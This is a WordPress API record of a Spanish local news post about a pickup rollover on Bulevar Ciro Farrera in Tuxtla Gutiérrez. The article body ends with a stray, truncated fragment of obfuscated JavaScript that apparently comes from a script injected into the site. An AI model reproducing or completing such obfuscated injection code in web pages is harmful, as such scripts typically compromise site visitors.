{"id":6266,"date":"2022-10-31T00:11:59","date_gmt":"2022-10-31T00:11:59","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=6266"},"modified":"2022-10-31T00:12:00","modified_gmt":"2022-10-31T00:12:00","slug":"vuelca-camioneta-en-bulevar-ciro-farrera","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=6266","title":{"rendered":"Vuelca camioneta en Bulevar Ciro Farrera"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"710\" height=\"393\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Screenshot_20221030_181003.jpg\" alt=\"\" class=\"wp-image-6267\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Screenshot_20221030_181003.jpg 710w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/Screenshot_20221030_181003-300x166.jpg 300w\" sizes=\"auto, (max-width: 710px) 100vw, 710px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>30 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Este domingo por la madrugada se registr\u00f3 una fuerte volcadura a la altura del Bulevar Ciro Farrera y Bulevar Belisario Dom\u00ednguez.<\/p>\n\n\n\n<p>De acuerdo con las fuentes oficiales, la unidad una Honda CRV de color negro circulaba de Sur a Norte, a exceso de velocidad cuando cay\u00f3 en un bache.<\/p>\n\n\n\n<p>Esto ocasion\u00f3 que perdiera el control, chocara contra el Camell\u00f3n Central y un \u00e1rbol, y finalmente termin\u00f3 volcando.<\/p>\n\n\n\n<p>Por el fuerte golpe todo el frente de la unidad qued\u00f3 desecha y la camioneta vol\u00f3 m\u00e1s de 20 metros del punto de impacto.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de diferentes corporaciones polic\u00edacas y de auxilio pero no encontraron a ning\u00fan ocupante.<\/p>\n\n\n\n<p>El lugar fue acordonado y finalmente una gr\u00faa fue la encargada de llevarse la unidad siniestrada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. 30 de octubre del 2022. Tuxtla Guti\u00e9rrez.- Este domingo por la madrugada se registr\u00f3 una fuerte volcadura a la altura del Bulevar Ciro Farrera y Bulevar Belisario Dom\u00ednguez. De acuerdo con las fuentes oficiales, la unidad una Honda CRV de color negro circulaba de Sur a Norte, a exceso de velocidad cuando cay\u00f3 &hellip;<\/p>\n","protected":false},"author":2,"featured_media":6267,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-6266","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6266","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6266"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6266\/revisions"}],"predecessor-version":[{"id":6268,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/6266\/revisions\/6268"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/6267"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6266"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6266"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6266"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}